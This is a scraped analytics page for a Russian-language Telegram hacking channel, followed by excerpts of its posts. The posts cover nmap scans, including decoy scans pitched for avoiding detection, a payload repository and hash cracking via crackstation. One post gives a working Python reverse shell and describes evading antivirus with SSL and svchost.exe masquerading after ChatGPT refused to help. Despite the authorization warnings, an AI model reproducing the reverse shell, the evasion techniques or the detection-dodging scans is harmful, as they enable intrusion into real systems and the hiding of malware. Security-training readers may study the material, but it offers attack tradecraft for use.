CodeGuard: PySec Edition
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Show more📈 Analytical overview of Telegram channel CodeGuard: PySec Edition
Channel CodeGuard: PySec Edition is an active participant. Currently, the community unites 14 026 subscribers, ranking 8 813 in the Technologies & Applications category and 46 152 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 14 026 subscribers.
According to the latest data from 23 September, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 734 over the last 30 days and by 21 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 10.45%. Within the first 24 hours after publication, content typically collects 5.49% reactions from the total number of subscribers.
- Post reach: On average, each post receives 1 466 views. Within the first day, a publication typically gains 770 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 8.
- Thematic interests: Content is focused on key topics such as codeguard, pysec, docker, grep, контейнер.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Thanks to the high frequency of updates (latest data received on 24 September, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
nmap -sS -T4 target.com
2. Сканирование всех 65535 портов
nmap -p- target.com
3. Определение версий служб и ОС
nmap -sV -O target.com
4. Поиск уязвимостей через скрипты NSE
nmap --script vuln target.com
5. Сохранение результата в файл
nmap -sV -oN scan_result.txt target.com
🔥 Бонус: подмена IP при сканировании
nmap -D RND:10 target.com
Сохраните в заметки — потеряется, будете гуглить 15 минут.
😈 CodeGuard: PySec Edition | Чат➡️SQL Injection — пейлоады для MySQL, PostgreSQL, MSSQL ➡️XSS — обход фильтров, стелы для cookie ➡️Reverse Shell — однострочники на bash, python, powershell, php ➡️File Inclusion — LFI/RFI эксплойты ➡️Upload Bypass — как загрузить шелл, если проверяют расширение🔥 Фишка: Всё структурировано по категориям, есть примеры запросов и ответов сервера. Просто копируешь и вставляешь в свой тест. Как использовать:
git clone https://github.com/swisskyrepo/PayloadsAllTheThings
cd PayloadsAllTheThings
Дальше ищи нужную папку и читай README.
⚠️ Только на своих виртуалках или с разрешения заказчика.
🔖 Сохраните репозиторий — будете возвращаться к нему каждую неделю.
😈 CodeGuard: PySec Edition | Чат➡️Эксплойты для последних CVE (от 2024-2025 годов) ➡️Shellcode для Windows/Linux/macOS ➡️Документы с разбором уязвимостей на русском (Google Translate в помощь)⚠️ Важно: Эксплойты с сайта — это оружие. Используйте ТОЛЬКО на своих виртуалках или с письменного разрешения владельца системы. За несанкционированный доступ — уголовная статья. 📚 Бонус: У Exploit-DB есть официальный репозиторий на GitHub 🔖 Сохраните в закладки. Пригодится на пентесте и CTF. 😈 CodeGuard: PySec Edition | Чат
nmap -sS -T4 target.com
-sS — SYN-скан (не открывает полное соединение, не светится в логах)
-T4 — ускоряем процесс
Шаг 2. Сканируем ВСЕ порты (65535)
nmap -p- -T4 target.com
Долго (5-10 минут), зато ничего не пропустите.
Шаг 3. Узнаём, что висит на открытых портах
nmap -sV -sC -p 22,80,443 target.com
-sV — версии служб
-sC — стандартные скрипты Nmap
Шаг 4. Автопоиск уязвимостей
nmap --script vuln target.com
Сам пробежится по базе CVE и покажет, где можно ударить.
Шаг 5. Сохраняем результат
nmap -sS -sV -oN result.txt target.com
-oN — обычный текстовый файл. Пригодится для отчёта.
🔥 Бонус: Если боитесь спалиться, добавьте -D RND:10 — Nmap подменит ваш IP на 10 случайных.
Что в итоге: Полный список портов, версий служб и потенциальных дыр. Сохраняйте результат — пригодится на пентесте.
😈 CodeGuard: PySec Edition | Чатimport socket, subprocess
s = socket.socket()
s.connect(('127.0.0.1', 4444))
subprocess.call(['/bin/sh', '-i'], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
🤦♂️ Проблема: Код рабочий, но любой антивирус его сразу выкурит. ChatGPT отказался добавлять обфускацию и шифрование, сославшись на политику безопасности.
Что сделал я:
➡️ Заменил '/bin/sh' на 'cmd.exe' (для Windows), зашифровал трафик через SSL и заматчил легитимный процесс svchost.exe. Запустил на своей тестовой виртуалке — антивирус молчал.Вывод: Нейросети полезны для идеи и базы, но тонкая настройка всё ещё за человеком. 😈 CodeGuard: PySec Edition | Чат
⚪️Введение и работа с терминалом ⚪️Криптография ⚪️Стего (стеганография) ⚪️Веб-уязвимости ⚪️Реверс-инжиниринг ⚪️PWN (эксплуатация бинарных уязвимостей) ⚪️Форензика (анализ инцидентов)Кому зайдет: Тем, кто хочет прокачать навыки в кибербезе, готовиться к CTF-соревнованиям или просто понимать, как работают атаки изнутри. 🔗 Ссылка на курс: stepik.org/course/xxxx 🧠 Курс полностью бесплатный, без смс и регистрации (ну, почти — залогиниться на Stepik всё же придётся). 😈 CodeGuard: PySec Edition | Чат
➡️ Огромная база на 15 миллиардов слов — самые частые пароли, реальные утечки, словари на 20 языках. Поддерживает MD5, SHA1, SHA256, NTLM и даже bcrypt (простые варианты).Как использовать: Вставляете хеш в поле — получаете исходный пароль. Пример:
Хеш 5f4dcc3b5aa765d61d8327deb882cf99 → пароль password Хеш e99a18c428cb38d5f260853678922e03 → пароль abc123Что удобно: Не нужно устанавливать ничего локально. Открыли браузер — и готово. ⚠️ Важное предупреждение: Никогда не вставляйте настоящие боевые хеши от реальных систем в онлайн-сервисы. Ваш пароль может утечь куда не надо. Для серьезных задач используйте офлайн hashcat на своем ПК. 🔗 Сайт: crackstation.net Кому пригодится: Пентестерам, сисадминам, забывчивым пользователям и всем, кто изучает криптографию. 😈 CodeGuard: PySec Edition | Чат
➡️ Огромная база на 15 миллиардов слов — самые частые пароли, реальные утечки, словари на 20 языках. Поддерживает MD5, SHA1, SHA256, NTLM и даже bcrypt (простые варианты).Как использовать: Вставляете хеш в поле — получаете исходный пароль. Пример:
Хеш 5f4dcc3b5aa765d61d8327deb882cf99 → пароль password Хеш e99a18c428cb38d5f260853678922e03 → пароль abc123Что удобно: Не нужно устанавливать ничего локально. Открыли браузер — и готово. ⚠️ Важное предупреждение: Никогда не вставляйте настоящие боевые хеши от реальных систем в онлайн-сервисы. Ваш пароль может утечь куда не надо. Для серьезных задач используйте офлайн hashcat на своем ПК. 🔗 Сайт: crackstation.net Кому пригодится: Пентестерам, сисадминам, забывчивым пользователям и всем, кто изучает криптографию. 😈 CodeGuard: PySec Edition | Чат
Docker Swarm предоставляет встроенный механизм управления секретами: пароли, ключи API и сертификаты передаются в контейнеры через зашифрованный канал и монтируются в «/run/secrets/» . Звучит безопасно — пока вы не осознаете, что любой пользователь с доступом к «docker exec» может прочитать эти секреты в любой момент жизни контейнера.📁 Источник 😈 CyberSec Edition | Чат
